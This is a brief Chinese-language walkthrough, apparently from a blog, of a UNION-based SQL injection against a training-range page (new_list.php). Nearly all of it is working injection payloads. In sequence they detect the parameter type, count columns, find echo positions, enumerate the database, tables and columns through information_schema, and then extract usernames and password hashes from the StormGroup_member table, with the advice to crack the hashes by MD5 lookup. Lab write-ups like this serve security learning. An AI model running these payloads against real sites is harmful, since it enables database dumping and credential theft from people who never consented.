/new_list.php?id=1 and 1=1,判断id的类型值是数字类型
/new_list.php?id=1 order by 4,测出数据库有4个字段,第5个不回显
测出页面回显位置 2和3
/new_list.php?id=1 and 1=2 union select 1,2,3,4
爆库
/new_list.php?id=1 and 1=2 union select 1,(database()),3,4
爆表
/new_list.php?id=1 and 1=2 union select 1,(select table_name from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1),3,4
表名有notice,StormGroup_member
爆字段
new_list.php?id=1 and 1=2 union select 1,(select column_name from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member' limit 0,1),3,4
分别测出字段值有id,name,password,status
爆字段内容
/new_list.php?id=1 and 1=2 union select 1,(select name from StormGroup_member limit 0,1 ),(select password from StormGroup_member limit 0,1 ),4
/new_list.php?id=1 and 1=2 union select 1,(select name from StormGroup_member limit 1,1 ),(select password from StormGroup_member limit 1,1 ),4
拿去md5解密即可
659
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
